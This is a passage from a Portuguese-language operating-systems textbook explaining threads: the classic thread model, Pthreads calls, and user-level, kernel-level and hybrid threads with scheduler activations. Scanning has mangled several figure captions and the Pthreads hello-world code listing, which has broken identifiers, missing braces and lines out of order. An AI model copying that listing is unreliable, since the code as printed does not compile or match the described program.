O servidor registra o estado da solicitação atual em 
uma tabela e então lida com o próximo evento. O pró- 
ximo evento pode ser uma solicitação para um novo 
trabalho ou uma resposta do disco sobre uma operação 
anterior. Se for um novo trabalho, esse trabalho é inicia- 
do. Se for uma resposta do disco, a informação relevan- 
te é buscada da tabela e a resposta processada. Com um 
sistema de E/S de disco sem bloqueios, uma resposta 
provavelmente terá de assumir a forma de um sinal ou 
interrupção. 

Nesse projeto, o modelo de “processo sequencial” 
que tínhamos nos primeiros dois casos é perdido. O 
estado da computação deve ser explicitamente salvo e 
restaurado na tabela toda vez que o servidor chaveia do 
trabalho de uma solicitação para outra. Na realidade, es- 
tamos simulando os threads e suas pilhas do jeito mais 
difícil. Um projeto como esse, no qual cada computação 


tem um estado salvo e existe algum conjunto de even- 
tos que pode ocorrer para mudar o estado, é chamado 
de máquina de estados finitos. Esse conceito é ampla- 
mente usado na ciência de computação. 

Deve estar claro agora o que os threads têm a ofe- 
recer. Eles tornam possível reter a ideia de processos 
sequenciais que fazem chamadas bloqueantes (por 
exemplo, para E/S de disco) e ainda assim alcançar o 
paralelismo. Chamadas de sistema bloqueantes tornam 
a programação mais fácil, e o paralelismo melhora o 
desempenho. O servidor de thread único retém a sim- 
plicidade das chamadas de sistema bloqueantes, mas 
abre mão do desempenho. A terceira abordagem alcan- 
ça um alto desempenho por meio do paralelismo, mas 
usa chamadas não bloqueantes e interrupções, e assim 
é difícil de programar. Esses modelos são resumidos 
na Figura 2.10. 

Um terceiro exemplo em que threads são úteis en- 
contra-se nas aplicações que precisam processar gran- 
des quantidades de dados. Uma abordagem normal é 
ler em um bloco de dados, processá-lo e então escrevê- 
-lo de novo. O problema aqui é que se houver apenas 
a disponibilidade de chamadas de sistema bloqueantes, 
o processo é bloqueado enquanto os dados estão che- 
gando e saindo. Ter uma CPU ociosa quando há muita 
computação a ser feita é um claro desperdício e deve ser 
evitado se possível. 

Threads oferecem uma solução: o processo pode- 
ria ser estruturado com um thread de entrada, um de 
processamento e um de saída. O thread de entrada lê 
dados para um buffer de entrada; o thread de processa- 
mento pega os dados do buffer de entrada, processa-os 
e coloca os resultados no buffer de saída; e o thread de 
saída escreve esses resultados de volta para o disco. 
Dessa maneira, entrada, saída e processamento podem 
estar todos acontecendo ao mesmo tempo. É claro que 
esse modelo funciona somente se uma chamada de 
sistema bloqueia apenas o thread de chamada, não o 
processo inteiro. 


Kell: TPA] Três maneiras de construir um servidor. 
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2.2.2 O modelo de thread clássico 


Agora que vimos por que os threads podem ser úteis 
e como eles podem ser usados, vamos investigar a ideia 
um pouco mais de perto. O modelo de processo é base- 
ado em dois conceitos independentes: agrupamento de 
recursos e execução. Às vezes é útil separá-los; é onde 
os threads entram. Primeiro, examinaremos o modelo 
de thread clássico; depois disso veremos o modelo de 
thread Linux, que torna indistintas as diferenças entre 
processos e threads. 

Uma maneira de se ver um processo é que ele é um 
modo para agrupar recursos relacionados. Um processo 
tem um espaço de endereçamento contendo o código e 
os dados do programa, assim como outros recursos. Es- 
ses recursos podem incluir arquivos abertos, processos 
filhos, alarmes pendentes, tratadores de sinais, informa- 
ção sobre contabilidade e mais. Ao colocá-los juntos na 
forma de um processo, eles podem ser gerenciados com 
mais facilidade. 

O outro conceito que um processo tem é de uma li- 
nha (thread) de execução, normalmente abreviado para 
apenas thread. O thread tem um contador de programa 
que controla qual instrução deve ser executada em se- 
guida. Ele tem registradores, que armazenam suas va- 
riáveis de trabalho atuais. Tem uma pilha, que contém 
o histórico de execução, com uma estrutura para cada 
rotina chamada, mas ainda não retornada. Embora um 
thread deva executar em algum processo, o thread e seu 
processo são conceitos diferentes e podem ser tratados 
separadamente. Processos são usados para agrupar re- 
cursos; threads são as entidades escalonadas para exe- 
cução na CPU. 

O que os threads acrescentam para o modelo de pro- 
cesso é permitir que ocorram múltiplas execuções no 
mesmo ambiente, com um alto grau de independência 
uma da outra. Ter múltiplos threads executando em 
paralelo em um processo equivale a ter múltiplos pro- 
cessos executando em paralelo em um computador. No 
primeiro caso, os threads compartilham um espaço de 
endereçamento e outros recursos. No segundo caso, os 
processos compartilham memórias físicas, discos, im- 
pressoras e outros recursos. Como threads têm algu- 
mas das propriedades dos processos, às vezes eles são 
chamados de processos leves. O termo multithread 
também é usado para descrever a situação de permitir 
múltiplos threads no mesmo processo. Como vimos 
no Capítulo 1, algumas CPUs têm suporte de hardwa- 
re direto para multithread e permitem que chaveamen- 
tos de threads aconteçam em uma escala de tempo de 
nanossegundos. 
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Na Figura 2.11(a) vemos três processos tradicionais. 
Cada processo tem seu próprio espaço de endereça- 
mento e um único thread de controle. Em comparação, 
na Figura 2.11(b) vemos um único processo com três 
threads de controle. Embora em ambos os casos tenha- 
mos três threads, na Figura 2.11(a) cada um deles opera 
em um espaço de endereçamento diferente, enquanto na 
Figura 2.11(b) todos os três compartilham o mesmo es- 
paço de endereçamento. 

Quando um processo multithread é executado em 
um sistema de CPU única, os threads se revezam exe- 
cutando. Na Figura 2.1, vimos como funciona a multi- 
programação de processos. Ao chavear entre múltiplos 
processos, o sistema passa a ilusão de processos se- 
quenciais executando em paralelo. O multithread fun- 
ciona da mesma maneira. A CPU chaveia rapidamente 
entre os threads, dando a ilusão de que eles estão exe- 
cutando em paralelo, embora em uma CPU mais lenta 
do que a real. Em um processo limitado pela CPU com 
três threads, eles pareceriam executar em paralelo, 
cada um em uma CPU com um terço da velocidade da 
CPU real. 


dic T FAE (a) Três processos, cada um com um thread. (b) 
Um processo com três threads. 
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Threads diferentes em um processo não são tão in- 
dependentes quanto processos diferentes. Todos os 
threads têm exatamente o mesmo espaço de endereça- 
mento, o que significa que eles também compartilham 
as mesmas variáveis globais. Tendo em vista que todo 
thread pode acessar todo espaço de endereçamento de 
memória dentro do espaço de endereçamento do pro- 
cesso, um thread pode ler, escrever, ou mesmo apagar 
a pilha de outro thread. Não há proteção entre threads, 
porque (1) é impossível e (2) não seria necessário. Ao 
contrário de processos distintos, que podem ser de usu- 
ários diferentes e que podem ser hostis uns com os ou- 
tros, um processo é sempre propriedade de um único 
usuário, que presumivelmente criou múltiplos threads 
de maneira que eles possam cooperar, não lutar. Além 
de compartilhar um espaço de endereçamento, todos os 
threads podem compartilhar o mesmo conjunto de ar- 
quivos abertos, processos filhos, alarmes e sinais, e as- 
sim por diante, como mostrado na Figura 2.12. Assim, 
a organização da Figura 2.11(a) seria usada quando os 
três processos forem essencialmente não relacionados, 
enquanto a Figura 2.11(b) seria apropriada quando os 
três threads fizerem na realidade parte do mesmo traba- 
lho e estiverem cooperando uns com os outros de ma- 
neira ativa e próxima. 

Na Figura 2.12, os itens na primeira coluna são pro- 
priedades de processos, não threads de propriedades. 
Por exemplo, se um thread abre um arquivo, esse ar- 
quivo fica visível aos outros threads no processo e eles 
podem ler e escrever nele. Isso é lógico, já que o pro- 
cesso, e não o thread, é a unidade de gerenciamento de 
recursos. Se cada thread tivesse o seu próprio espaço 
de endereçamento, arquivos abertos, alarmes pendentes 
e assim por diante, seria um processo em separado. O 
que estamos tentando alcançar com o conceito de thread 


Bele EAF] A primeira coluna lista alguns itens 
compartilhados por todos os threads em 


um processo. A segunda lista alguns itens 
específicos a cada thread. 
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é a capacidade para múltiplos threads de execução de 
compartilhar um conjunto de recursos de maneira que 
possam trabalhar juntos intimamente para desempenhar 
alguma tarefa. 

Como um processo tradicional (isto é, um processo 
com apenas um thread), um thread pode estar em qual- 
quer um de vários estados: em execução, bloqueado, 
pronto, ou concluído. Um thread em execução tem a 
CPU naquele momento e está ativo. Em comparação, 
um thread bloqueado está esperando por algum even- 
to para desbloqueá-lo. Por exemplo, quando um thread 
realiza uma chamada de sistema para ler do teclado, 
ele está bloqueado até que uma entrada seja digitada. 
Um thread pode bloquear esperando por algum even- 
to externo acontecer ou por algum outro thread para 
desbloqueá-lo. Um thread pronto está programado para 
ser executado e o será tão logo chegue a sua vez. As 
transições entre estados de thread são as mesmas que 
aquelas entre estados de processos e estão ilustradas na 
Figura 2.2. 

É importante perceber que cada thread tem a sua pró- 
pria pilha, como ilustrado na Figura 2.13. Cada pilha do 
thread contém uma estrutura para cada rotina chamada, 
mas ainda não retornada. Essa estrutura contém as vari- 
áveis locais da rotina e o endereço de retorno para usar 
quando a chamada de rotina for encerrada. Por exem- 
plo, se a rotina X chama a rotina Y e Y chama a rotina 
Z, então enquanto Z está executando, as estruturas para 
X, Ye Z estarão todas na pilha. Cada thread geralmente 
chamará rotinas diferentes e desse modo terá uma histó- 
ria de execução diferente. Essa é a razão pela qual cada 
thread precisa da sua própria pilha. 

Quando o multithreading está presente, os processos 
normalmente começam com um único thread presente. 
Esse thread tem a capacidade de criar novos, chamando 
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uma rotina de biblioteca como thread create. Um pa- 
râmetro para thread create especifica o nome de uma 
rotina para o novo thread executar. Não é necessário 
(ou mesmo possível) especificar algo sobre o espaço 
de endereçamento do novo thread, tendo em vista que 
ele automaticamente é executado no espaço de endere- 
çamento do thread em criação. As vezes, threads são 
hierárquicos, com uma relação pai-filho, mas muitas 
vezes não existe uma relação dessa natureza, e todos os 
threads são iguais. Com ou sem uma relação hierárqui- 
ca, normalmente é devolvido ao thread em criação um 
identificador de thread que nomeia o novo thread. 

Quando um thread tiver terminado o trabalho, pode 
concluir sua execução chamando uma rotina de biblio- 
teca, como thread exit. Ele então desaparece e não é 
mais escalonável. Em alguns sistemas, um thread pode 
esperar pela saída de um thread (específico) chaman- 
do uma rotina, por exemplo, thread join. Essa rotina 
bloqueia o thread que executou a chamada até que um 
thread (específico) tenha terminado. Nesse sentido, 
a criação e a conclusão de threads é muito semelhante à 
criação e ao término de processos, com mais ou menos 
as mesmas opções. 

Outra chamada de thread comum é thread yield, que 
permite que um thread abra mão voluntariamente da 
CPU para deixar outro thread ser executado. Uma cha- 
mada dessas é importante porque não há uma interrup- 
ção de relógio para realmente forçar a multiprogramação 
como há com os processos. Desse modo, é importante 
que os threads sejam educados e voluntariamente entre- 
guem a CPU de tempos em tempos para dar aos outros 
threads uma chance de serem executados. Outras cha- 
madas permitem que um thread espere por outro thread 
para concluir algum trabalho, para um thread anunciar 
que terminou alguma tarefa e assim por diante. 

Embora threads sejam úteis na maioria das vezes, 
eles também introduzem uma série de complicações 
no modelo de programação. Para começo de conversa, 
considere os efeitos da chamada fork de sistema UNIX. 
Se o processo pai tem múltiplos threads, o filho não 
deveria tê-los também? Do contrário, é possível que o 
processo não funcione adequadamente, tendo em vista 
que todos eles talvez sejam essenciais. 

No entanto, se o processo filho possuir tantos threads 
quanto o pai, o que acontece se um thread no pai estava 
bloqueado em uma chamada read de um teclado? Dois 
threads estão agora bloqueados no teclado, um no pai e 
outro no filho? Quando uma linha é digitada, ambos os 
threads recebem uma cópia? Apenas o pai? Apenas o 
filho? O mesmo problema existe com conexões de rede 
abertas. 
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Outra classe de problemas está relacionada ao fato 
de que threads compartilham muitas estruturas de da- 
dos. O que acontece se um thread fecha um arquivo 
enquanto outro ainda está lendo dele? Suponha que 
um thread observe que há pouca memória e comece 
a alocar mais memória. No meio do caminho há um 
chaveamento de threads, e o novo também observa 
que há pouca memória e também começa a alocar mais 
memória. A memória provavelmente será alocada duas 
vezes. Esses problemas podem ser solucionados com 
algum esforço, mas os programas de multithread de- 
vem ser pensados e projetados com cuidado para fun- 
cionarem corretamente. 


2.2.3 Threads POSIX 


Para possibilitar que se escrevam programas com 
threads portáteis, o IEEE definiu um padrão para threads 
no padrão IEEE 1003.1c. O pacote de threads que ele 
define é chamado Pthreads. A maioria dos sistemas 
UNIX dá suporte a ele. O padrão define mais de 60 
chamadas de função, um número grande demais para 
ser visto aqui. Em vez disso, descreveremos apenas al- 
gumas das principais para dar uma ideia de como fun- 
cionam. As chamadas que descreveremos a seguir estão 
listadas na Figura 2.14. 

Todos os threads têm determinadas propriedades. 
Cada um tem um identificador, um conjunto de registra- 
dores (incluindo o contador de programa), e um conjun- 
to de atributos, que são armazenados em uma estrutura. 
Os atributos incluem tamanho da pilha, parâmetros de 
escalonamento e outros itens necessários para usar o 
thread. 


eln TFAL Algumas das chamadas de função do Pthreads. 





Chamada de thread Descrição 





Pthread create Cria um novo thread 





Pthread exit Conclui a chamada de thread 





Pthread join Espera que um thread específico 


seja abandonado 


Pthread yield Libera a CPU para que outro 


thread seja executado 





Cria e inicializa uma estrutura de 
atributos do thread 


Pthread attr init 





Remove uma estrutura de 
atributos do thread 


Pthread attr destroy 
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Um novo thread é criado usando a chamada pthread _ 
create. O identificador de um thread recentemente cria- 
do é retornado como o valor da função. Essa chamada 
é intencionalmente muito parecida com a chamada de 
sistema fork (exceto pelos parâmetros), com o identi- 
ficador de thread desempenhando o papel do PID (nú- 
mero de processo), em especial para identificar threads 
referenciados em outras chamadas. 

Quando um thread tiver acabado o trabalho para o qual 
foi designado, ele pode terminar chamando pthread exit. 
Essa chamada para o thread e libera sua pilha. 

Muitas vezes, um thread precisa esperar outro termi- 
nar seu trabalho e sair antes de continuar. O que está es- 
perando chama pthread join para esperar outro thread 
específico terminar. O identificador do thread pelo qual 
se espera é dado como parâmetro. 

Às vezes acontece de um thread não estar logi- 
camente bloqueado, mas sente que já foi executado 
tempo suficiente e quer dar a outro thread a chance de 


le) WA ES Um exemplo de programa usando threads. 


#include <pthread.h> 

#include <stdio.h> 

#include <stdlib.h> 

#define NUMBER OF THREADS 10 


void *print. hello. world(void xtid) 


ser executado. Ele pode atingir essa meta chamando 
pthread yield. Essa chamada não existe para proces- 
SOS, pois o pressuposto aqui é que os processos são 
altamente competitivos e cada um quer o tempo de 
CPU que conseguir obter. No entanto, já que os threads 
de um processo estão trabalhando juntos e seu código 
é invariavelmente escrito pelo mesmo programador, 
às vezes o programador quer que eles se deem outra 
chance. 

As duas chamadas seguintes de thread lidam com 
atributos. Pthread attr init cria a estrutura de atributos 
associada com um thread e o inicializa com os valo- 
res padrão. Esses valores (como a prioridade) podem 
ser modificados manipulando campos na estrutura de 
atributos. 

Por fim, pthread attr destroy remove a estrutura de 
atributos de um thread, liberando a sua memória. Essa 
chamada não afeta os threads que a usam; eles continu- 
am a existir. 


/* Esta funcao imprime o identificador do thread e sai. */ 
printf("Ola mundo. Boas vindas do thread %d\n", tid); 


pthread. exit(NULL); 
} 


int main(int argc, char *argv[]) 


{ 


/* O programa principal cria 10 threads e sai. */ 
pthread tthreads[NUMBER OF. THREADS]; 


int status, i; 


for(i=0; i < NUMBER. OF. THREADS; i++) { 
printf("Metodo Main. Criando thread %d\n", i); 
status = pthread_create(&threads[i], NULL, print. hello. world, (void *)i); 


if (status != 0) { 


printf("Oops. pthread. create returned error code %d\n", status); 


exit(-1); 


} 
exit(NULL); 


Para ter uma ideia melhor de como o Pthreads fun- 
ciona, considere o exemplo simples da Figura 2.15. Aqui 
o principal programa realiza NUMBER OF THREADS 
iterações, criando um novo thread em cada iteração, após 
anunciar sua intenção. Se a criação do thread fracassa, ele 
imprime uma mensagem de erro e então termina. Após 
criar todos os threads, o programa principal termina. 

Quando um thread é criado, ele imprime uma men- 
sagem de uma linha anunciando a si mesmo e então 
termina. A ordem na qual as várias mensagens são in- 
tercaladas é indeterminada e pode variar em execuções 
consecutivas do programa. 

As chamadas Pthreads descritas anteriormente não 
são as únicas. Examinaremos algumas das outras após 
discutir a sincronização de processos e threads. 


2.2.4 Implementando threads no espaço do 
usuário 


Há dois lugares principais para implementar threads: 
no espaço do usuário e no núcleo. A escolha é um pou- 
co controversa, e uma implementação híbrida também 
é possível. Descreveremos agora esses métodos, junto 
com suas vantagens e desvantagens. 

O primeiro método é colocar o pacote de threads 
inteiramente no espaço do usuário. O núcleo não sabe 
nada a respeito deles. Até onde o núcleo sabe, ele está 
gerenciando processos comuns de um único thread. A 
primeira vantagem, e mais óbvia, é que o pacote de 
threads no nível do usuário pode ser implementado em 
um sistema operacional que não dá suporte aos threads. 
Todos os sistemas operacionais costumavam cair nes- 
sa categoria, e mesmo agora alguns ainda caem. Com 
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essa abordagem, threads são implementados por uma 
biblioteca. 

Todas essas implementações têm a mesma estrutura 
geral, ilustrada na Figura 2.16(a). Os threads executam 
em cima de um sistema de tempo de execução, que é 
uma coleção de rotinas que gerencia os threads. Já vi- 
mos quatro desses: pthread create, pthread exit, pthre- 
ad join e pthread yield, mas geralmente há mais. 

Quando os threads são gerenciados no espaço do 
usuário, cada processo precisa da sua própria tabela de 
threads privada para controlá-los naquele processo. Ela 
é análoga à tabela de processo do núcleo, exceto por 
controlar apenas as propriedades de cada thread, como 
o contador de programa, o ponteiro de pilha, registra- 
dores, estado e assim por diante. A tabela de threads é 
gerenciada pelo sistema de tempo de execução. Quando 
um thread vai para o estado pronto ou bloqueado, a in- 
formação necessária para reiniciá-lo é armazenada na 
tabela de threads, exatamente da mesma maneira que o 
núcleo armazena informações sobre processos na tabela 
de processos. 

Quando um thread faz algo que possa bloqueá-lo lo- 
calmente, por exemplo, esperar que outro thread em seu 
processo termine um trabalho, ele chama uma rotina do 
sistema de tempo de execução. Essa rotina verifica se o 
thread precisa ser colocado no estado bloqueado. Caso 
isso seja necessário, ela armazena os registradores do 
thread (isto é, os seus próprios) na tabela de threads, pro- 
cura na tabela por um thread pronto para ser executado, 
e recarrega os registradores da máquina com os valores 
salvos do novo thread. Tão logo o ponteiro de pilha e 
o contador de programa tenham sido trocados, o novo 
thread ressurge para a vida novamente de maneira auto- 
mática. Se a máquina porventura tiver uma instrução para 


Ke TEA (a) Um pacote de threads no espaço do usuário. (b) Um pacote de threads gerenciado pelo núcleo. 
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armazenar todos os registradores e outra para carregá-los, 
todo o chaveamento do thread poderá ser feito com ape- 
nas um punhado de instruções. Realizar um chaveamento 
de thread como esse é pelo menos uma ordem de mag- 
nitude — talvez mais — mais rápida do que desviar o 
controle para o núcleo, além de ser um forte argumento a 
favor de pacotes de threads de usuário. 

No entanto, há uma diferença fundamental com os 
processos. Quando um thread decide parar de execu- 
tar — por exemplo, quando ele chama thread yield — 
o código de thread yield pode salvar as informações 
do thread na própria tabela de thread. Além disso, ele 
pode então chamar o escalonador de threads para pe- 
gar outro thread para executar. A rotina que salva o 
estado do thread e o escalonador são apenas rotinas 
locais, de maneira que invocá-las é algo muito mais 
eficiente do que fazer uma chamada de núcleo. Entre 
outras coisas, nenhuma armadilha (trap) é necessária, 
nenhum chaveamento de contexto é necessário, a ca- 
che de memória não precisa ser esvaziada e assim por 
diante. Isso torna o escalonamento de thread muito 
rápido. 

Threads de usuário também têm outras vantagens. 
Eles permitem que cada processo tenha seu próprio al- 
goritmo de escalonamento customizado. Para algumas 
aplicações, por exemplo, aquelas com um thread coletor 
de lixo, é uma vantagem não ter de se preocupar com 
um thread ser parado em um momento inconveniente. 
Eles também escalam melhor, já que threads de núcleo 
sempre exigem algum espaço de tabela e de pilha no nú- 
cleo, o que pode ser um problema se houver um número 
muito grande de threads. 

Apesar do seu melhor desempenho, pacotes de threads 
de usuário têm alguns problemas importantes. Primeiro, 
o problema de como chamadas de sistema bloqueantes 
são implementadas. Suponha que um thread leia de 
um teclado antes que quaisquer teclas tenham sido 
acionadas. Deixar que o thread realmente faça a cha- 
mada de sistema é algo inaceitável, visto que isso pa- 
rará todos os threads. Uma das principais razões para 
ter threads era permitir que cada um utilizasse chama- 
das com bloqueio, enquanto evitaria que um thread 
bloqueado afetasse os outros. Com chamadas de siste- 
ma bloqueantes, é difícil ver como essa meta pode ser 
alcançada prontamente. 

As chamadas de sistema poderiam ser todas modi- 
ficadas para que não bloqueassem (por exemplo, um 
read no teclado retornaria apenas O byte se nenhum 
caractere já estivesse no buffer), mas exigir mudan- 
ças para o sistema operacional não é algo atraente. 
Além disso, um argumento para threads de usuário 


era precisamente que eles podiam ser executados com 
sistemas operacionais existentes. Ainda, mudar a se- 
mântica de read exigirá mudanças para muitos pro- 
gramas de usuários. 

Mais uma alternativa encontra-se disponível no caso 
de ser possível dizer antecipadamente se uma chamada 
será bloqueada. Na maioria das versões de UNIX, existe 
uma chamada de sistema, select, que permite a quem 
chama saber se um read futuro será bloqueado. Quando 
essa chamada está presente, a rotina de biblioteca read 
pode ser substituída por uma nova que primeiro faz uma 
chamada select e, então, faz a chamada read somente se 
ela for segura (isto é, não for bloqueada). Se a chama- 
da read for bloqueada, a chamada não é feita. Em vez 
disso, outro thread é executado. Da próxima vez que o 
sistema de tempo de execução assumir o controle, ele 
pode conferir de novo se a read está então segura. Essa 
abordagem exige reescrever partes da biblioteca de cha- 
madas de sistema, e é algo ineficiente e deselegante, 
mas há pouca escolha. O código colocado em torno da 
chamada de sistema para fazer a verificação é chamado 
de jacket ou wrapper. 

Um problema de certa maneira análogo às chama- 
das de sistema bloqueantes é o problema das faltas de 
páginas. Nós as estudaremos no Capítulo 3. Por ora, 
basta dizer que os computadores podem ser configu- 
rados de tal maneira que nem todo o programa está na 
memória principal ao mesmo tempo. Se o programa 
chama ou salta para uma instrução que não esteja na 
memória, ocorre uma falta de página e o sistema ope- 
racional buscará a instrução perdida (e suas vizinhas) 
do disco. Isso é chamado de uma falta de página. O 
processo é bloqueado enquanto as instruções neces- 
sárias estão sendo localizadas e lidas. Se um thread 
causa uma falta de página, o núcleo, desconhecendo 
até a existência dos threads, naturalmente bloqueia o 
processo inteiro até que o disco de E/S esteja comple- 
to, embora outros threads possam ser executados. 

Outro problema com pacotes de threads de usuário 
é que se um thread começa a ser executado, nenhum 
outro naquele processo será executado a não ser que 
o primeiro thread voluntariamente abra mão da CPU. 
Dentro de um único processo, não há interrupções de 
relógio, impossibilitando escalonar processos pelo es- 
quema de escalonamento circular (dando a vez ao ou- 
tro). A menos que um thread entre voluntariamente no 
sistema de tempo de execução, o escalonador jamais 
terá uma chance. 

Uma solução possível para o problema de threads 
sendo executados infinitamente é obrigar o sistema 
de tempo de execução a solicitar um sinal de relógio 


(interrupção) a cada segundo para dar a ele o contro- 
le, mas isso, também, é algo grosseiro e confuso para o 
programa. Interrupções periódicas de relógio em uma 
frequência mais alta nem sempre são possíveis, e mes- 
mo que fossem, a sobrecarga total poderia ser substan- 
cial. Além disso, um thread talvez precise também de 
uma interrupção de relógio, interferindo com o uso do 
relógio pelo sistema de tempo de execução. 

Outro — e o mais devastador — argumento contra 
threads de usuário é que os programadores geralmente 
desejam threads precisamente em aplicações nas quais 
eles são bloqueados com frequência, por exemplo, em 
um servidor web com múltiplos threads. Esses threads 
estão constantemente fazendo chamadas de sistema. 
Uma vez que tenha ocorrido uma armadilha para o nú- 
cleo a fim de executar uma chamada de sistema, não 
daria muito mais trabalho para o núcleo trocar o thread 
sendo executado, se ele estiver bloqueado, o núcleo 
fazendo isso elimina a necessidade de sempre realizar 
chamadas de sistema select que verificam se as chama- 
das de sistema read são seguras. Para aplicações que 
são em sua essência inteiramente limitadas pela CPU e 
raramente são bloqueadas, qual o sentido de usar threads? 
Ninguém proporia seriamente computar os primeiros n 
números primos ou jogar xadrez usando threads, porque 
não há nada a ser ganho com isso. 


2.2.5 Implementando threads no núcleo 


Agora vamos considerar que o núcleo saiba sobre 
os threads e os gerencie. Não é necessário um sistema 
de tempo de execução em cada um, como mostrado na 
Figura 2.16(b). Também não há uma tabela de thread 
em cada processo. Em vez disso, o núcleo tem uma ta- 
bela que controla todos os threads no sistema. Quando 
um thread quer criar um novo ou destruir um existente, 
ele faz uma chamada de núcleo, que então faz a cria- 
ção ou a destruição atualizando a tabela de threads do 
núcleo. 

A tabela de threads do núcleo contém os registra- 
dores, estado e outras informações de cada thread. A 
informação é a mesma com os threads de usuário, mas 
agora mantidas no núcleo em vez de no espaço do usu- 
ário (dentro do sistema de tempo de execução). Essa 
informação é um subconjunto das informações que os 
núcleos tradicionais mantêm a respeito dos seus proces- 
sos de thread único, isto é, o estado de processo. Além 
disso, o núcleo também mantém a tabela de processos 
tradicional para controlar os processos. 

Todas as chamadas que poderiam bloquear um thread 
são implementadas como chamadas de sistema, a um 
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custo consideravelmente maior do que uma chama- 
da para uma rotina de sistema de tempo de execução. 
Quando um thread é bloqueado, o núcleo tem a opção 
de executar outro thread do mesmo processo (se um es- 
tiver pronto) ou algum de um processo diferente. Com 
threads de usuário, o sistema de tempo de execução se- 
gue executando threads a partir do seu próprio processo 
até o núcleo assumir a CPU dele (ou não houver mais 
threads prontos para serem executados). 

Em decorrência do custo relativamente maior de se 
criar e destruir threads no núcleo, alguns sistemas as- 
sumem uma abordagem ambientalmente correta e re- 
ciclam seus threads. Quando um thread é destruído, ele 
é marcado como não executável, mas suas estruturas 
de dados de núcleo não são afetadas de outra maneira. 
Depois, quando um novo thread precisa ser criado, um 
antigo é reativado, evitando parte da sobrecarga. A re- 
ciclagem de threads também é possível para threads de 
usuário, mas tendo em vista que o overhead de geren- 
ciamento de threads é muito menor, há menos incentivo 
para fazer isso. 

Threads de núcleo não exigem quaisquer chamadas 
de sistema novas e não bloqueantes. Além disso, se um 
thread em um processo provoca uma falta de página, o 
núcleo pode facilmente conferir para ver se o processo 
tem quaisquer outros threads executáveis e, se assim for, 
executar um deles enquanto espera que a página exigida 
seja trazida do disco. Sua principal desvantagem é que 
o custo de uma chamada de sistema é substancial, então 
se as operações de thread (criação, término etc.) forem 
frequentes, ocorrerá uma sobrecarga muito maior. 

Embora threads de núcleo solucionem alguns proble- 
mas, eles não resolvem todos eles. Por exemplo, o que 
acontece quando um processo com múltiplos threads é 
bifurcado? O novo processo tem tantos threads quanto 
o antigo, ou possui apenas um? Em muitos casos, a me- 
lhor escolha depende do que o processo está planejando 
fazer em seguida. Se ele for chamar exec para começar 
um novo programa, provavelmente um thread é a esco- 
lha correta, mas se ele continuar a executar, reproduzir 
todos os threads talvez seja o melhor. 

Outra questão são os sinais. Lembre-se de que os sinais 
são enviados para os processos, não para os threads, pelo 
menos no modelo clássico. Quando um sinal chega, qual 
thread deve cuidar dele? Threads poderiam talvez regis- 
trar seu interesse em determinados sinais, de maneira 
que, ao chegar um sinal, ele seria dado para o thread 
que disse querê-lo. Mas o que acontece se dois ou mais 
threads registraram interesse para o mesmo sinal? Esses 
são apenas dois dos problemas que os threads introdu- 
zem, mas há outros. 
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2.2.6 Implementações híbridas 


Várias maneiras foram investigadas para tentar com- 
binar as vantagens de threads de usuário com threads de 
núcleo. Uma maneira é usar threads de núcleo e então 
multiplexar os de usuário em alguns ou todos eles, como 
mostrado na Figura 2.17. Quando essa abordagem é 
usada, o programador pode determinar quantos threads 
de núcleo usar e quantos threads de usuário multiplexar 
para cada um. Esse modelo proporciona o máximo em 
flexibilidade. 

Com essa abordagem, o núcleo está consciente ape- 
nas dos threads de núcleo e os escalona. Alguns desses 
threads podem ter, em cima deles, múltiplos threads de 
usuário multiplexados, os quais são criados, destruídos 
e escalonados exatamente como threads de usuário em 
um processo executado em um sistema operacional sem 
capacidade de múltiplos threads. Nesse modelo, cada 
thread de núcleo tem algum conjunto de threads de usu- 
ário que se revezam para usá-lo. 


2.2.7 Ativações pelo escalonador 


Embora threads de núcleo sejam melhores do que 
threads de usuário em certos aspectos-chave, eles são 
também indiscutivelmente mais lentos. Como conse- 
quência, pesquisadores procuraram maneiras de melho- 
rar a situação sem abrir mão de suas boas propriedades. 
A seguir descreveremos uma abordagem desenvolvida 
por Anderson et al. (1992), chamada ativações pelo 
escalonador. Um trabalho relacionado é discutido por 
Edler et al. (1988) e Scott et al. (1990). 

A meta do trabalho da ativação pelo escalonador é 
imitar a funcionalidade dos threads de núcleo, mas com 
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melhor desempenho e maior flexibilidade normalmen- 
te associados aos pacotes de threads implementados no 
espaço do usuário. Em particular, threads de usuário 
não deveriam ter de fazer chamadas de sistema espe- 
ciais sem bloqueio ou conferir antecipadamente se é se- 
guro fazer determinadas chamadas de sistema. Mesmo 
assim, quando um thread é bloqueado em uma chama- 
da de sistema ou uma página falha, deve ser possível 
executar outros threads dentro do mesmo processo, se 
algum estiver pronto. 

A eficiência é alcançada evitando-se transições des- 
necessárias entre espaço do usuário e do núcleo. Se um 
thread é bloqueado esperando por outro para fazer algo, 
por exemplo, não há razão para envolver o núcleo, pou- 
pando assim a sobrecarga da transição núcleo-usuário. 
O sistema de tempo de execução pode bloquear o thread 
de sincronização e escalonar sozinho um novo. 

Quando ativações pelo escalonador são usadas, o nú- 
cleo designa um determinado número de processadores 
virtuais para cada processo e deixa o sistema de tempo 
de execução (no espaço do usuário) alocar threads para 
eles. Esse mecanismo também pode ser usado em um 
multiprocessador onde os processadores virtuais podem 
ser CPUs reais. O número de processadores virtuais alo- 
cados para um processo é de início um, mas o processo 
pode pedir mais e também pode devolver processadores 
que não precisa mais. O núcleo também pode retomar 
processadores virtuais já alocados a fim de colocá-los 
em processos mais necessitados. 

A ideia básica para o funcionamento desse esque- 
ma é a seguinte: quando sabe que um thread foi blo- 
queado (por exemplo, tendo executado uma chamada 
de sistema bloqueante ou causado uma falta de página), 
o núcleo notifica o sistema de tempo de execução do 
processo, passando como parâmetros na pilha o número 
do thread em questão e uma descrição do evento que 
ocorreu. A notificação acontece quando o núcleo ativa o 
sistema de tempo de execução em um endereço inicial 
conhecido, de maneira mais ou menos análoga a um si- 
nal em UNIX. Esse mecanismo é chamado upcall. 

Uma vez ativado, o sistema de tempo de execução 
pode reescalonar os seus threads, tipicamente marcando 
o thread atual como bloqueado e tomando outro da lista 
pronta, configurando seus registradores e reinicializan- 
do-o. Depois, quando o núcleo fica sabendo que o thread 
original pode executar de novo (por exemplo, o pipe do 
qual ele estava tentando ler agora contém dados, ou a pá- 
gina sobre a qual ocorreu uma falta foi trazida do disco), 
ele faz outro upcall para informar o sistema de tempo de 
execução. O sistema de tempo de execução pode então 


reiniciar o thread bloqueado imediatamente ou colocá-lo 
na lista de prontos para executar mais tarde. 

Quando ocorre uma interrupção de hardware en- 
quanto um thread de usuário estiver executando, a CPU 
interrompida troca para o modo núcleo. Se a interrup- 
ção for causada por um evento que não é de interesse 
